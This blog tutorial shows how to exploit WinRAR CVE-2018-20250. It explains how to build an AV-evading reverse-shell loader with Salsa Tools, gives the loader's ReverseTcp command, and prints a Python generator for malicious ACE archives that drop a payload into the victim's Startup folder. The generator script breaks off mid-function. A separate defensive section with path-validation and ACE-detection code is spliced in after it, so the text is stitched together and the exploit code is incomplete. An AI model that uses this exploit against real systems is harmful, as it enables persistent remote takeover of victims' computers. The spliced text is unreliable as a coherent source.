Manuel López Pérez · tutorials · 3 min read

Remote Code Execution WinRAR (CVE-2018-20250) POC

Proof of Concept (PoC) for the WinRAR CVE-2018-20250 vulnerability, allowing remote code execution by extracting malicious files to arbitrary directories. Step-by-step guide to create a malicious ACE file that executes a payload on system startup.

Hi, today I bring you the proof of concept of a vulnerability that was found a few days ago in WinRAR. This vulnerability has existed for 19 years and has been patched in version 5.70 beta 1, so if you are a WinRAR user it is very important that you update the software.

Basically, this vulnerability allows us to extract malicious files into an arbitrary directory. The vulnerability is described in detail at research.checkpoint.com, so we will only show how to exploit it. Our target will be the Startup directory (although you can choose any other) because our malicious file will be executed once the victim restarts the computer. I have chosen to use Salsa Tools from @CyberVaca_ as the malicious binary because with it we get a reverse shell (with some extra features such as bypassing AMSI) and the anti-virus won't detect it.

Phases:

  • Create the malicious binary.
  • Create the ACE file.
  • Wait for the victim to reboot the computer.

Creating the binary

As I said before, we're going to use Salsa Tools. First we have to compile the EvilSalsa.dll library (open it with Visual Studio and build it) and encrypt it with EncrypterAssembly:

python encrypterassembly.py EvilSalsa.dll PASSWORD evil.txt 

Now let's compile the SalseoLoader (I have modified it to read its parameters from a text file called args.txt). I decided to host evil.txt (obtained after encrypting EvilSalsa.dll) via SMBServer, but there are other options.

SalseoLoader.exe PASSWORD evil.txt ReverseTcp IP PORT

Creating the ACE file - 1st Method

Using this script we'll be able to create a malicious ACE file: https://github.com/manulqwerty/Evil-WinRAR-Gen

[python]
#!/usr/bin/env python3
import acefile
import argparse
import binascii
import struct
import os


class color:
    # ANSI colour codes for terminal output
    PURPLE = '\033[95m'
    CYAN = '\033[96m'
    DARKCYAN = '\033[36m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    RED = '\033[91m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    END = '\033[0m'


def getArgs():
    parser = argparse.ArgumentParser(description='Evil WinRAR Archive Generator (CVE-2018-20250) - Target: WinRAR < 5.70 beta 1\nBy @manulqwerty - ironhackers.es')
    parser.add_argument('-o', dest='filename', type=str, help='Output filename - Default: evil.rar', default='evil.rar')
    parser.add_argument('-e', metavar='evil_file', nargs='+', dest='evil', type=str, help='Evil files', required=True)
    parser.add_argument('-g', metavar='good_file', nargs='+', dest='good', type=str, help='Good files', required=False)
    parser.add_argument('-p', dest='path', type=str, help='Path to uncompress the evil files - Default: C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\evil.exe', default='C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\')
    return parser.parse_args()


def printHeader():
    # ASCII-art banner (line breaks of the art are not preserved here)
    print(color.BOLD + color.GREEN + ''' _ _ __ ___ ___ _ ___ _____ _(_) | \ \ / (_)_ _ | _ \ /_\ | _ \\ / -_) V / | | \ \/\/ /| | ' \| / / _ \| / \___|\_/|_|_| \_/\_/ |_|_||_|_|_\/_/ \_\_|_\\''' + color.END
          + color.RED + '''\n\n by @manulqwerty\n\n'''
          + color.BLUE + color.BOLD + '''----------------------------------------------------------------------\n''' + color.END)


def writeShellcode(shellcode, filename):
    # Write a hex string to a new file as raw bytes
    with open(filename, 'wb+') as f:
        f.write(binascii.unhexlify(shellcode))


def addShellcode(shellcode, filename):
    # Append a hex string to an existing file as raw bytes
    with open(filename, 'ab+') as f:
        f.write(binascii.unhexlify(shellcode))


def readShellcode(filename):
    # Read a file and return its contents as an upper-case hex string
    with open(filename, 'rb') as f:
        return binascii.hexlify(f.read()).decode('utf-8').upper()


def hex2raw(hex_value, N):
    # Zero-pad to N hex digits and reverse the byte order (little-endian)
    hex_value = hex_value.zfill(N)
    return ''.join([hex_value[x-1:x+1] for x in range(len(hex_value)-1, 0, -2)]).ljust(N, '0')


def buildShellcode(filename, path=''):
    # Build the hex string of a file header entry for `filename`, stored under `path`
    if path == '':
        path = filename
    hdr_crc_raw = '6789'
    hdr_size_raw = hex(len(path)+31)[2:]
    hdr_size_raw = hex2raw(hdr_size_raw, 4)
    packsize_raw = hex(os.path.getsize(filename))[2:]
    packsize_raw = hex2raw(packsize_raw, 8)
    origsize_raw = packsize_raw
    with open(filename, 'rb') as f:
        crc32_raw = hex(acefile.ace_crc32(f.read()))[2:]
    crc32_raw = hex2raw(crc32_raw, 8)
    filename_len_raw = hex(len(path))[2:]
    filename_len_raw = hex2raw(filename_len_raw, 4)
    filename_raw = "".join("{:x}".format(ord(c)) for c in path)
    shellcode = hdr_crc_raw + hdr_size_raw + "010180" + packsize_raw \
        + origsize_raw + "63B0554E20000000" + crc32_raw + "00030A005445" \
        + filename_len_raw + filename_raw + "01020304050607080910A1A2A3A4A5A6A7A8A9"
    return shellcode


def str2bytes(str_input):
    return binascii.a2b_hex(str_input.upper())


def calCRC(shellcode):
    buf = str2bytes(shellcode)
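As an added defensive counterpart (this is example code written for this page, not code from the post or from Evil-WinRAR-Gen), the following Python shows the two checks a defender wants against this class of bug: the extraction-path validation a hardened unarchiver must apply before writing any member (the check WinRAR's ACE module lacked), and a triage check that tells an ACE archive apart from a real RAR behind a .rar extension and lists embedded names that look like traversal attempts. The destination directory, the header stub and the member names are constructed samples; the only format fact relied on is that ACE archives carry the `**ACE**` signature at offset 7 of the main header.

```python
"""Defensive checks for CVE-2018-20250-style path traversal in archive members.
Added example; not part of the original post or of Evil-WinRAR-Gen.
All sample data below is constructed."""
import ntpath
import re
from typing import Dict, List, Optional

ACE_MAGIC = b"**ACE**"  # present at offset 7 of the main header of every ACE archive

# Constructed sample: the traversal name the post's generator uses by default.
EVIL_NAME = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\evil.exe"
DEST_DIR = r"C:\Users\victim\Downloads\extract"  # constructed extraction directory


def split_member_name(name: str) -> Optional[List[str]]:
    """Return clean path components for an archive member name, or None if the
    name could escape the extraction directory."""
    parts = name.replace("\\", "/").split("/")   # extractors accept both separators
    if parts[0] == "":                             # leading separator: absolute path
        return None
    clean = []
    for p in parts:
        if p in ("", "."):
            continue
        if p == "..":                              # classic traversal
            return None
        if ":" in p:                               # drive letter, ADS, or the "C:\C:C:.." prefix
            return None
        if any(ord(ch) < 32 for ch in p):          # control characters
            return None
        clean.append(p)
    return clean or None


def safe_target_path(dest_dir: str, member_name: str) -> Optional[str]:
    """Compute where a member would be written; None means 'refuse to extract'."""
    parts = split_member_name(member_name)
    if parts is None:
        return None
    dest_norm = ntpath.normpath(dest_dir)
    target = ntpath.normpath(ntpath.join(dest_norm, *parts))
    # Belt and braces: the normalised result must still lie below dest_dir.
    if not target.lower().startswith(dest_norm.lower() + "\\"):
        return None
    return target


def audit_members(dest_dir: str, names: List[str]) -> Dict[str, Optional[str]]:
    """Map each member name to its safe target path, or None if it is rejected."""
    return {n: safe_target_path(dest_dir, n) for n in names}


def is_ace_archive(data: bytes) -> bool:
    """True if the bytes are an ACE archive, whatever the file extension says."""
    return len(data) >= 14 and data[7:14] == ACE_MAGIC


_NAME_RE = re.compile(rb"[\x20-\x7e]{4,}")  # printable runs that could be file names


def suspicious_names(data: bytes) -> List[str]:
    """Crude triage: embedded printable strings that look like traversal or absolute paths."""
    hits = []
    for m in _NAME_RE.finditer(data):
        s = m.group().decode("ascii")
        if split_member_name(s) is None and ("/" in s or "\\" in s or ":" in s):
            hits.append(s)
    return hits


# Constructed archive stub: a fake ACE main header followed by two member names.
SAMPLE_ARCHIVE = (
    b"\x00" * 7 + ACE_MAGIC + b"\x00" * 10
    + b"docs/readme.txt\x00"
    + EVIL_NAME.encode("ascii") + b"\x00"
)

if __name__ == "__main__":
    print("ACE archive:", is_ace_archive(SAMPLE_ARCHIVE))
    for name in suspicious_names(SAMPLE_ARCHIVE):
        print("suspicious member name:", name)
    for name, target in audit_members(DEST_DIR, ["docs/readme.txt", "../../evil.exe", EVIL_NAME]).items():
        print(f"{name!r} -> {target or 'REJECTED'}")
```

The component-level rejection of `..`, any `:` and leading separators is deliberately stricter than a pure `normpath` check: `ntpath.normpath` treats `C:C:..` as an ordinary directory name and would not collapse it, which is exactly why a validator has to look at the raw components before joining them. The signature check matters for mail gateways and EDR rules because the PoC ships an ACE archive under a `.rar` name.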
